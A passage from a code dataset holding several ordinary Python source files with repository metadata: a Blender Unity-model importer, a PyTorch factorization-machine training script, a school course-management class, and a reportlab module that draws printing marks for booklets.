bpy.context.active_object\n bone_shape.name = \"bone_shape\"\n bone_shape.use_fake_user = True\n #bone_shape.empty_draw_size = 0.2\n bpy.context.scene.objects.unlink(bone_shape) # don't want the user deleting this\n bpy.context.scene.objects.active = ob_amt\n \n bpy.ops.object.mode_set(mode='POSE')\n \n # apply custom shape\n for bone in ob_amt.pose.bones:\n bone.custom_shape = bone_shape\n \n # third pass: apply bone scales\n for bone_name, bone_data in self.model['bones'].items():\n bone = ob_amt.pose.bones.get(bone_name)\n bone.scale = bone_data['lscl']\n \n bpy.ops.object.mode_set(mode='OBJECT')\n \n def get_bone_scale(self, bone_name, scale):\n bone_data = self.model['bones'][bone_name]\n scale *= (bone_data['lscl'][0] + bone_data['lscl'][1] + bone_data['lscl'][2]) / 3\n \n bone_parent_name = bone_data.get('parent')\n if bone_parent_name:\n scale = self.get_bone_scale(bone_parent_name, scale)\n \n return scale\n \n\ndef menu_func_import(self, context):\n self.layout.operator(ImportPythonModel.bl_idname, text=\"Unity Python model script (.py)\")\n\ndef register():\n bpy.utils.register_class(ImportPythonModel)\n bpy.types.INFO_MT_file_import.append(menu_func_import)\n\ndef unregister():\n bpy.utils.unregister_class(ImportPythonModel)\n bpy.types.INFO_MT_file_import.remove(menu_func_import)\n\nif __name__ == \"__main__\":\n register()\n\n # test call\n #bpy.ops.import_mesh.unity('INVOKE_DEFAULT')\n", "repo_name": "ata4/unity-editor-utils", "sub_path": "Blender/io_import_unity.py", "file_name": "io_import_unity.py", "file_ext": "py", "file_size_in_byte": 8408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 27, "dataset": "github-code", "pt": "53", "api": [{"api_name": "bpy.types.Operator", "line_number": 22, "usage_type": "name"}, {"api_name": "bpy_extras.io_utils.ImportHelper", "line_number": 22, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 49, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.new", "line_number": 61, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 61, "usage_type": "attribute"}, {"api_name": "math.radians", "line_number": 62, "usage_type": "call"}, {"api_name": "bpy.data.objects.new", "line_number": 68, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 68, "usage_type": "attribute"}, {"api_name": "bpy.data.armatures.new", "line_number": 75, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 75, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.new", "line_number": 79, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 79, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.objects.link", "line_number": 92, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 92, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.objects.link", "line_number": 93, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 93, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.objects.link", "line_number": 94, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 94, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 97, "usage_type": "attribute"}, {"api_name": "bpy.data.meshes.new", "line_number": 102, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 102, "usage_type": "attribute"}, {"api_name": "bmesh.new", "line_number": 103, "usage_type": "call"}, {"api_name": "bpy.data.materials.get", "line_number": 120, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 120, "usage_type": "attribute"}, {"api_name": "bpy.data.materials.new", "line_number": 122, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 122, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.mode_set", "line_number": 155, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 155, "usage_type": "attribute"}, {"api_name": "mathutils.Vector", "line_number": 169, "usage_type": "call"}, {"api_name": "bpy.ops.object.mode_set", "line_number": 181, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 181, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.get", "line_number": 184, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 184, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.empty_add", "line_number": 186, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 186, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 187, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.objects.unlink", "line_number": 191, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 191, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 192, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.mode_set", "line_number": 194, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 194, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.mode_set", "line_number": 205, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 205, "usage_type": "attribute"}, {"api_name": "bpy.utils.register_class", "line_number": 222, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 222, "usage_type": "attribute"}, {"api_name": "bpy.types.INFO_MT_file_import.append", "line_number": 223, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 223, "usage_type": "attribute"}, {"api_name": "bpy.utils.unregister_class", "line_number": 226, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 226, "usage_type": "attribute"}, {"api_name": "bpy.types.INFO_MT_file_import.remove", "line_number": 227, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 227, "usage_type": "attribute"}]} +{"seq_id": "40392748064", "text": "from FM.data import CbDataNew\nfrom FM.layers import WideDeep, DeepFM, NFM, DeepCross, AFM, xDeepFM\nfrom FM.utils import roc_auc_compute\nfrom sklearn.metrics import roc_auc_score\nimport torch\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nimport numpy as np\nimport warnings\nimport time\nimport os\nfrom sklearn.metrics import roc_auc_score\nwarnings.filterwarnings(\"ignore\")\n\n\nclass Main:\n\n def __init__(self, gbdt_model, pre_defined_idx, device, data_or_dataroot, emb_size, model_save_dir,\n model_name, concat_wide):\n assert model_name in ['WideDeep', 'DeepFM', 'NFM', 'DeepCross', 'AFM', 'xDeepFM']\n self.model_name = model_name\n self.emb_size = emb_size\n self.concat_wide = concat_wide\n self.pre_defined_idx = pre_defined_idx # 更训练gbdt 时的样本保持一致;相同的train,val,test;\n self.gbdt_model = gbdt_model\n if isinstance(data_or_dataroot, str):\n self.train_dataset = CbDataNew(root_dir=data_or_dataroot,\n add_CLS=False,\n gbdt_model=gbdt_model,\n data_idx=pre_defined_idx[0])\n\n self.val_dataset = CbDataNew(root_dir=data_or_dataroot,\n add_CLS=False,\n gbdt_model=gbdt_model,\n data_idx=pre_defined_idx[1])\n else:\n print('use given dataset')\n self.train_dataset, self.val_dataset = data_or_dataroot\n self.num_trees = self.val_dataset.num_trees\n self.leaf_num_per_tree = self.val_dataset.leaf_num_per_tree\n self.device = device\n self.model_save_dir = model_save_dir\n if model_name == 'WideDeep':\n self.model = WideDeep(num_uniq_leaf=self.leaf_num_per_tree * self.num_trees,\n num_trees=self.num_trees,\n dim_leaf_emb=emb_size).to(device)\n\n elif model_name == 'DeepFM':\n self.model = DeepFM(self.leaf_num_per_tree * self.num_trees,\n self.num_trees,\n emb_size,\n concat_wide).to(device)\n\n elif model_name == 'NFM':\n self.model = NFM(self.leaf_num_per_tree * self.num_trees,\n self.num_trees,\n emb_size,\n concat_wide).to(device)\n\n elif model_name == 'DeepCross':\n self.model = DeepCross(self.leaf_num_per_tree * self.num_trees,\n self.num_trees,\n emb_size,\n num_layers=4,\n concat_wide=concat_wide).to(device)\n\n elif model_name == 'AFM':\n self.model = AFM(self.leaf_num_per_tree * self.num_trees, emb_size).to(device)\n\n elif model_name == 'xDeepFM':\n self.model = xDeepFM(num_layers=4,\n layer_filters=4,\n num_uniq_leaf=self.leaf_num_per_tree * self.num_trees,\n num_trees=self.num_trees,\n dim_leaf_emb=emb_size,\n concat_wide=concat_wide).to(device)\n print(self.model)\n self.criterion = nn.BCELoss()\n\n def train(self, epoch, batch_size, lr, weight_decay, verbose, save_model, save_log, eval_full_epoch, early_stop):\n if early_stop:\n self.early_stop = True\n else:\n self.early_stop = False\n self.best_val_auc = -1\n self.early_stop_tolerate = 0\n self.stop_flag = False\n if verbose == 1:\n self.verbose = 1\n else:\n self.verbose = 0\n if save_log:\n dir_path = os.getcwd() + '/run_log_dir/'\n print(\"train log will be saved in directory:\" + \"run_log_dir\")\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n file = open(dir_path + '{}_logs{}.txt'.format(self.model_name,\n time.strftime(\"%Y-%m-%d_%H:%M:%S\", time.localtime())), 'w')\n file.writelines(\n '------------------class init paras------------------\\nemb_size{}\\nmodel_name:{}\\nmodel_save_dir:{}\\nconcat_wide:{}\\n'.format(\n self.emb_size, self.model_name, self.model_save_dir,\n self.concat_wide))\n\n file.writelines(\n '\\n------------------train paras------------------\\nepoch:{}\\nbatch_size:{}\\nlr:{}\\nweight_decay:{}\\nverbose:{}\\nsave_model:{}\\neval_full_epoch:{}\\n'.format(\n epoch, batch_size,\n lr, weight_decay, verbose,\n save_model, eval_full_epoch))\n else:\n file = None\n self.train_loader = DataLoader(dataset=self.train_dataset, batch_size=batch_size)\n if eval_full_epoch:\n self.val_loader = DataLoader(dataset=self.val_dataset, batch_size=len(self.val_dataset))\n else:\n self.val_loader = DataLoader(dataset=self.val_dataset, batch_size=batch_size)\n optimizer = torch.optim.Adam(self.model.parameters(), lr=lr,\n betas=(0.9, 0.999), eps=1e-08, weight_decay=weight_decay)\n print('start training ......')\n for epoch_id in range(epoch):\n if self.stop_flag is True:\n break\n t0 = time.time()\n train_loss, val_loss, train_auc, val_auc = self._train_epoch(optimizer=optimizer, log_file=file)\n\n if verbose == 1:\n if save_log:\n file.writelines(\n '\\n----------------------- epoch_id:{}/{} use:{} seconds -------------------------\\n'.format(\n epoch_id, epoch, time.time() - t0))\n file.writelines(\n 'train_loss:{} valid:loss:{} \\n\\ntrain_auc:{} valid_auc:{}\\n'.format(train_loss, val_loss,\n train_auc, val_auc))\n\n print('\\n----------------------- epoch_id:{}/{} use:{} seconds --------------------------'.format(\n epoch_id, epoch, time.time() - t0))\n print(\n 'train_loss:{} valid:loss:{} \\n\\ntrain_auc:{} valid_auc:{}'.format(train_loss, val_loss, train_auc,\n val_auc))\n\n if save_model:\n if save_log:\n file.writelines('\\nmodel saved in {}'.format(\n self.model_save_dir + '{}_epoch_{}_auc_{}'.format(self.model_name, epoch_id, val_auc)))\n\n print('\\nmodel saved in {}'.format(\n self.model_save_dir + '{}_epoch_{}_auc_{}'.format(self.model_name, epoch_id, val_auc)))\n torch.save(self.model,\n self.model_save_dir + '{}_epoch_{}_auc_{}'.format(self.model_name, epoch_id, val_auc))\n if save_log:\n file.close()\n\n def _train_epoch(self, optimizer, log_file=None):\n train_targets_list, train_logit_list, train_loss_list, batch_idx = [], [], [], None\n for batch_idx, data in enumerate(self.train_loader):\n if self.stop_flag is True:\n break\n inputs = data['x'].to(self.device)\n target = data['y'].to(self.device)\n optimizer.zero_grad()\n score = self.model(inputs)\n loss = self.criterion(score, target.float())\n loss.backward()\n optimizer.step()\n # print('batch_idx:{} use:{} seconds'.format(batch_idx, time.time() - t0))\n train_targets_list.append(target)\n train_logit_list.append(score)\n train_loss_list.append(loss.tolist())\n if batch_idx % 10 == 0:\n self.train_loss = np.mean(train_loss_list)\n self.train_auc = roc_auc_compute(torch.cat(train_targets_list), torch.cat(train_logit_list).detach())\n self._eval_epoch(batch_idx=batch_idx, log_file=log_file)\n return self._eval_epoch(batch_idx=batch_idx, log_file=log_file)\n\n def _eval_epoch(self, batch_idx, log_file=None):\n self.model.eval()\n with torch.no_grad():\n val_target_list, val_logit_list, val_loss_list = [], [], []\n for idx, data in enumerate(self.val_loader):\n inputs = data['x'].to(self.device)\n target = data['y'].to(self.device)\n logits = self.model(inputs)\n val_loss = self.criterion(logits, target.float())\n val_target_list.append(target)\n val_logit_list.append(logits)\n val_loss_list.append(val_loss.tolist())\n if idx == 30:\n break\n val_loss = np.mean(val_loss_list)\n val_auc = roc_auc_compute(torch.cat(val_target_list), torch.cat(val_logit_list))\n if val_auc >= self.best_val_auc:\n self.best_val_auc = val_auc\n else:\n self.early_stop_tolerate += 1\n\n if (self.early_stop_tolerate == 5) and (self.early_stop is True):\n print('early_stop_tolerate = 5, with best val_auc:{}'.format(self.best_val_auc))\n if log_file:\n log_file.writelines('\\nearly_stop_tolerate = 5, with best val_auc:{}'.format(self.best_val_auc))\n self.stop_flag = True\n\n if self.verbose != 1:\n print('\\n--------------------------------batch_num:{}/{}----------------------------------------'.format(\n batch_idx, len(self.train_loader.dataset) // self.train_loader.batch_size))\n print('train_loss:{} valid:loss:{}\\ntrain_auc:{} valid_auc:{}'.format(self.train_loss, val_loss,\n self.train_auc, val_auc))\n if log_file is not None:\n log_file.writelines(\n '\\n------------------------------batch_num:{}/{}-------------------------------------\\n'.format(\n batch_idx, len(self.train_loader.dataset) // self.train_loader.batch_size))\n log_file.writelines('train_loss:{} valid:loss:{}\\ntrain_auc:{} valid_auc:{}'.format(self.train_loss,\n val_loss,\n self.train_auc,\n val_auc))\n return self.train_loss, val_loss, self.train_auc, val_auc\n\n def predict(self, new_x, load_path=None):\n if load_path:\n model = torch.load(load_path)\n else:\n model = self.model\n model.eval()\n logits = model(new_x)\n return logits\n\n def eval_(self, x, y, load_path=None):\n x = torch.tensor(x)\n output = self.predict(x, load_path)\n return roc_auc_score(y, output.detach().numpy().flatten())\n", "repo_name": "brakeman/general_pro", "sub_path": "FM/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11448, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 13, "usage_type": "call"}, {"api_name": "FM.data.CbDataNew", "line_number": 27, "usage_type": "call"}, {"api_name": "FM.data.CbDataNew", "line_number": 32, "usage_type": "call"}, {"api_name": "FM.layers.WideDeep", "line_number": 44, "usage_type": "call"}, {"api_name": "FM.layers.DeepFM", "line_number": 49, "usage_type": "call"}, {"api_name": "FM.layers.NFM", "line_number": 55, "usage_type": "call"}, {"api_name": "FM.layers.DeepCross", "line_number": 61, "usage_type": "call"}, {"api_name": "FM.layers.AFM", "line_number": 68, "usage_type": "call"}, {"api_name": "FM.layers.xDeepFM", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 96, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 98, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 116, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 122, "usage_type": "call"}, {"api_name": "time.time", "line_number": 129, "usage_type": "call"}, {"api_name": "time.time", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 169, "usage_type": "call"}, {"api_name": "FM.utils.roc_auc_compute", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 188, "usage_type": "call"}, {"api_name": "FM.utils.roc_auc_compute", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 226, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 228, "usage_type": "call"}]} +{"seq_id": "26418163204", "text": "from conf import settings\nfrom lib.mypickle import MyPickle\nfrom core.Classes import Classes\n\n\nclass Course(object):\n\n def __init__(self, role, name, cycle, price, city):\n self.role = role\n self.name = name\n self.cycle = cycle # 周期\n self.price = price # 价格\n self.city = city # 城市\n\n @staticmethod\n def course_all(): # 查看所有课程详细信息,返回生成器\n return MyPickle(settings.file_name['course']).load()\n\n @staticmethod\n def get_course(course, role): # 查看角色对应的课程详细信息\n if not course or not role:\n return '课程和角色不能为空!'\n course_list = []\n for i in Course.course_all(): # 遍历所有课程\n if role == 'Manager': # 管理员查看所有\n course_list.append(i)\n elif role == 'Student': # 学生只能查看自己\n if course == i['name']:\n course_list.append(i)\n # return course_list\n elif role == 'Teacher': # 老师只能查看自己\n if course == i['name']:\n course_list.append(i)\n # return course_list\n else:\n return '角色未定义!'\n\n return course_list\n\n @staticmethod\n def course_exist(course): # 判断课程是否存在\n '''\n :param course: 课程\n :return: True 可用(课程不存在) False 不可用(课程已存在)\n '''\n if course == '':\n print('课程不能为空!')\n return False\n for i in Course.course_all(): # 遍历所有课程\n # 判断用户名是否匹配\n if course == i['name']:\n # 当找到匹配时,return False\n return False\n return True\n\n @staticmethod\n def course_classes(course): # 查看课程对应的班级\n if not course:\n print('课程不能为空!')\n return False\n\n course_list = []\n for i in Classes.classes_all(): # 遍历所有班级\n if course == i['course']:\n course_list.append(i['name'])\n return course_list\n\n @staticmethod\n def course_teacher(course): # 查看课程对应的老师\n if not course:\n print('课程不能为空!')\n return False\n\n teacher_all = MyPickle(settings.file_name['teacher']).load() # 遍历所有老师\n teacher = []\n for i in teacher_all:\n if course == i['course']:\n teacher.append(i['name'])\n return teacher\n\n @staticmethod\n def course_info(): # 查看课程名列表,比如['linux', 'python', 'go']\n course_list = []\n for i in Course.course_all():\n course_list.append(i['name'])\n return course_list\n\n\nif __name__ == '__main__':\n pass\n", "repo_name": "py3study/school_management", "sub_path": "core/Course.py", "file_name": "Course.py", "file_ext": "py", "file_size_in_byte": 2906, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "lib.mypickle.MyPickle", "line_number": 17, "usage_type": "call"}, {"api_name": "conf.settings.file_name", "line_number": 17, "usage_type": "attribute"}, {"api_name": "conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "core.Classes.Classes.classes_all", "line_number": 63, "usage_type": "call"}, {"api_name": "core.Classes.Classes", "line_number": 63, "usage_type": "name"}, {"api_name": "lib.mypickle.MyPickle", "line_number": 74, "usage_type": "call"}, {"api_name": "conf.settings.file_name", "line_number": 74, "usage_type": "attribute"}, {"api_name": "conf.settings", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "13092059161", "text": "from __future__ import annotations\n\n# Python standard\n\nfrom copy import copy\nimport io\nfrom math import floor\n\n# Type hint\nfrom typing import Union, Callable, List, Tuple, Dict, Literal\nfrom types import FunctionType\nfrom io import BytesIO, FileIO\n\n# PDF\nimport PyPDF2 as pypdf\nfrom reportlab.pdfgen.canvas import Canvas\n\n# Project modules\nfrom booklet.core.manuscript import Template, Manuscript\nimport booklet.utils.validation as vailidation\nfrom booklet.utils.conversion import mm\nfrom booklet.utils.color import Basis_Colors\nfrom booklet.utils.misc import *\n\n\nclass PrintingMark(Template):\n \"\"\"\n Add printing markers to each page.\n \"\"\"\n\n __name__ = \"printing mark\"\n __desciprtion__ = \"Add printing marks to manuscript\"\n\n @property\n def name(self):\n return PrintingMark.__name__\n\n @property\n def description(self):\n return PrintingMark.__desciprtion__\n\n def __init__(\n self,\n on: bool = False,\n margin: int = 43, # pts\n crop: bool = True,\n reg: bool = True,\n cmyk: bool = True,\n fold: bool = True,\n direction: bool = True\n ):\n\n self.on = on if type(on) == bool else False\n self.margin = margin if margin != None else 43\n self.crop = bool(crop)\n self.reg = bool(reg)\n self.cmyk = bool(cmyk)\n\n super().__init__(direction=True)\n\n def ____basic_position(\n self, pagesize: Tuple[float, float]\n ) -> Tuple[\n Tuple[float, float, float, float], Tuple[Tuple[float, float, float, float]]\n ]:\n x1 = self.margin * 0.25\n x2 = self.margin + pagesize[0] + x1\n y1 = self.margin + pagesize[1]\n y2 = self.margin\n\n x3 = y2\n x4 = x2 - x1\n y3 = x1\n y4 = y1 + y3\n\n return [[x1, x2, x3, x4], [y1, y2, y3, y4]]\n\n def __get_paper_dim(self, pagesize: Tuple[float, float]) -> Tuple[float, float]:\n width, height = pagesize\n x = 2 * self.margin + width\n y = 2 * self.margin + height\n return x, y\n\n def __draw_crop_lines(self, canvas: Canvas, positions: list = []) -> bool:\n if self.crop:\n if len(positions) == 0:\n positions = self.___get_crop_line_positions(self.manu_paper_format)\n canvas.setLineWidth(0.5 * mm)\n canvas.lines(positions)\n return True\n return False\n\n def __draw_registration(\n self, canvas: Canvas, ratio: float = 0.8, positions: list = []\n ) -> bool:\n self.reg_l = 0\n pagesize = self.manu_paper_format\n if self.reg:\n self.reg_l = l = ratio * self.margin\n center = self.margin / 2\n if len(positions) == 0:\n positions = self.___get_registeration_positions(l, center, pagesize)\n for position in positions:\n self.___draw_registration_mark(\n canvas=canvas, x=position[0], y=position[1], l=l\n )\n return True\n return False\n\n def __draw_color_marker(self, canvas: Canvas) -> bool:\n if self.cmyk:\n cyan = [(0.2 * (1 + i), 0, 0, 0) for i in range(0, 5)]\n magenta = [(0, 0.2 * (1 + i), 0, 0) for i in range(0, 5)]\n yellow = [(0, 0, 0.2 * (1 + i), 0) for i in range(0, 5)]\n black = [(0, 0, 0, 0.2 * (1 + i)) for i in range(0, 5)]\n\n color_sequence = [\n (1, 0, 0, 0),\n (1, 1, 0, 0),\n (0, 1, 0, 0),\n (0, 1, 1, 0),\n (0, 0, 1, 0),\n (1, 0, 1, 0),\n (1, 0, 0, 0),\n ]\n\n color_row1 = cyan + magenta\n color_row2 = yellow + black\n pagesize = self.manu_paper_format\n (\n vertical,\n case,\n origin,\n origin_s,\n length,\n ) = self.___get_color_marker_position_and_length(\n pagesize, padding_ratio=0.15\n )\n\n row, column = case.split(\"x\")\n\n row = int(row)\n column = int(column)\n color_map = (\n [color_row1, color_row2] if row == 2 else [color_row1 + color_row2]\n )\n\n if not vertical:\n column, row = row, column\n color_map = List12dim.transpose(color_map)\n\n for i in range(0, row):\n for j in range(0, column):\n square_coordinate = (origin[0] + length * i, origin[1] + length * j)\n color = color_map[i][j]\n c, m, y, k = color\n canvas.saveState()\n canvas.setLineWidth(0)\n canvas.setFillColorCMYK(c, m, y, k)\n canvas.setStrokeColorCMYK(0, 0, 0, 0)\n canvas.rect(\n square_coordinate[0],\n square_coordinate[1],\n length,\n length,\n stroke=1,\n fill=1,\n )\n canvas.restoreState()\n origin_s\n for k in range(0, len(color_sequence)):\n i, j = (0 if vertical else k, k if vertical else 0)\n square_coordinate = (origin_s[0] + i * length, origin_s[1] + j * length)\n color = color_sequence[k]\n c, m, y, k = color\n canvas.saveState()\n canvas.setLineWidth(0)\n canvas.setFillColorCMYK(c, m, y, k)\n canvas.setStrokeColorCMYK(0, 0, 0, 0)\n canvas.rect(\n square_coordinate[0],\n square_coordinate[1],\n length,\n length,\n stroke=1,\n fill=1,\n )\n canvas.restoreState()\n\n return True\n return False\n\n def ___get_crop_line_positions(\n self, pagesize: Tuple[float, float]\n ) -> list[\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n ]:\n trim_l = self.margin * 0.5\n x, y = self.____basic_position(pagesize)\n return [\n (x[0], y[0], x[0] + trim_l, y[0]), # h, u l\n (x[0], y[1], x[0] + trim_l, y[1]), # h, d l\n (x[1], y[0], x[1] + trim_l, y[0]), # h, u r\n (x[1], y[1], x[1] + trim_l, y[1]), # h, d r\n (x[2], y[3], x[2], y[3] + trim_l), # v, u l\n (x[2], y[2], x[2], y[2] + trim_l), # v, d l\n (x[3], y[3], x[3], y[3] + trim_l), # v, u r\n (x[3], y[2], x[3], y[2] + trim_l), # v, d r\n ]\n\n def ___get_registeration_positions(\n self, l: float, center: float, pagesize: Tuple[float, float]\n ) -> list[\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n ]:\n x, y = self.____basic_position(pagesize)\n trim_l = self.margin / 2\n return [\n (center - l / 2, y[0] - center - l),\n (center - l / 2, y[1] + center),\n (x[1] + trim_l / 2 - l / 2, y[0] - center - l),\n (x[1] + trim_l / 2 - l / 2, y[1] + center),\n (x[2] + center, y[3] + trim_l / 2 - l / 2),\n (x[2] + center, center - l / 2),\n (x[3] - center - l, y[3] + trim_l / 2 - l / 2),\n (x[3] - center - l, center - l / 2),\n ]\n\n def ___get_color_marker_position_and_length(\n self, pagesize: Tuple[float, float], padding_ratio: float\n ) -> Tuple[list, Literal[\"2x10\", \"1x20\"], list, list, float]:\n\n # Calculate side and head size and choose bigger one.\n pa = padding_ratio * self.margin\n hor = pagesize[0] - 2 * self.reg_l - self.margin\n ver = pagesize[1] - 2 * self.reg_l - self.margin\n\n if 2 * pa > hor or 2 * pa > ver:\n pa_t = padding_ratio * min(hor, ver)\n else:\n pa_t = pa\n vertical = True\n\n if ver < hor:\n vertical = False\n space_size = (hor - 2 * pa_t, self.margin - 2 * pa)\n origin = [self.margin * 1.5 + self.reg_l + pa_t, 0]\n\n else:\n space_size = (self.margin - 2 * pa, ver - 2 * pa_t)\n origin = [0, self.margin * 1.5 + self.reg_l + pa_t]\n\n # Fit 2x10, 1x20 to the empty space and calculate square size(min(width, height) respectively)\n # and choose bigger size\n # 2x10 case\n if vertical:\n dim2 = space_size[0] * 0.5\n dim10 = space_size[1] * 0.1\n else:\n dim2 = space_size[1] * 0.5\n dim10 = space_size[0] * 0.1\n dim2_10 = min(dim2, dim10)\n # 1x32 case\n if vertical:\n dim1 = space_size[0]\n dim20 = space_size[1] * 0.05\n else:\n dim1 = space_size[1]\n dim20 = space_size[0] * 0.05\n dim1_20 = min(dim1, dim20)\n\n square_length = max(dim2_10, dim1_20)\n case = \"2x10\" if dim2_10 > dim1_20 else \"1x20\"\n\n padding = self.margin / 2 - (\n square_length if case == \"2x10\" else square_length / 2\n )\n if ver < hor:\n origin[1] = padding\n else:\n origin[0] = padding\n\n # origin_mixed = (self.margin+hor+2*self.reg_l+pa, self.margin+pa) if vertical else (self.margin +pa, self.margin+ ver + 2*self.margin+ pa)\n origin_mixed = copy(origin)\n if ver < hor:\n origin_mixed[1] = self.margin * 1.5 + pagesize[1] - square_length * 0.5\n else:\n origin_mixed[0] = self.margin * 1.5 + pagesize[0] - square_length * 0.5\n\n return vertical, case, origin, origin_mixed, square_length\n\n def ___draw_registration_mark(\n self, canvas: Canvas, x: float, y: float, l: float\n ) -> NoReturn:\n def get_abpath4(x0, y0, x1, y1):\n return (x + x0, y + y0, x + x1, y + y1)\n\n def get_abpath2(x0, y0):\n return x + x0, y + y0\n\n line_t = l / 15 # /25\n line_l = l * (3 / 16)\n circle_r1 = l * (5 / 16) - line_t\n circle_r2 = circle_r1 - line_t * (1.5)\n\n lines = [\n get_abpath4(0, l / 2, line_l, l / 2),\n get_abpath4(l - line_l, l / 2, l, l / 2),\n get_abpath4(l / 2, 0, l / 2, line_l),\n get_abpath4(l / 2, l - line_l, l / 2, l),\n ]\n canvas.setLineWidth(line_t)\n canvas.setStrokeColor(Basis_Colors[\"reg\"])\n canvas.setFillColor(Basis_Colors[\"reg\"])\n # Draw cross line\n canvas.lines(lines)\n # Outer circle parts\n arcs_outer = canvas.beginPath()\n c = l / 2 - line_t / 2\n a = c - circle_r1\n b = c + circle_r1\n x1, y1 = get_abpath2(\n a, a\n ) # Same relative coordinate values are not same in abs different basis\n x2, y2 = get_abpath2(b, b)\n arcs_outer.arc(x1, y1, x2, y2, startAng=180, extent=90)\n arcs_outer.arc(x1 + line_t, y1, x2 + line_t, y2, startAng=270, extent=90)\n arcs_outer.arc(\n x1 + line_t, y1 + line_t, x2 + line_t, y2 + line_t, startAng=0, extent=90\n )\n arcs_outer.arc(x1, y1 + line_t, x2, y2 + line_t, startAng=90, extent=90)\n canvas.drawPath(arcs_outer, fill=0, stroke=1)\n\n # inner circle parts\n arcs_inner = canvas.beginPath()\n a = c - circle_r2\n b = c + circle_r2\n x1, y1 = get_abpath2(a, a)\n x2, y2 = get_abpath2(b, b)\n xc, yc = get_abpath2(l / 2, l / 2)\n d = line_t / 2\n arcs_inner.moveTo(xc - d, yc - d)\n arcs_inner.arcTo(x1, y1, x2, y2, startAng=180, extent=90)\n arcs_inner.moveTo(xc + d, yc - d)\n arcs_inner.arcTo(x1 + line_t, y1, x2 + line_t, y2, startAng=270, extent=90)\n arcs_inner.moveTo(xc + d, yc + d)\n arcs_inner.arcTo(\n x1 + line_t, y1 + line_t, x2 + line_t, y2 + line_t, startAng=0, extent=90\n )\n arcs_inner.moveTo(xc - d, yc + d)\n arcs_inner.arcTo(x1, y1 + line_t, x2, y2 + line_t, startAng=90, extent=90)\n\n canvas.drawPath(arcs_inner, fill=1, stroke=0)\n\n def generate_template(\n self, manuscript: Manuscript\n ) -> Tuple[pypdf.PdfFileReader, BytesIO]:\n self.manu_paper_format = manuscript.file_paper_format\n paper_format = self.__get_paper_dim(self.manu_paper_format)\n\n tem_byte = io.BytesIO()\n printing_template = Canvas(tem_byte, pagesize=paper_format)\n\n if self.crop:\n 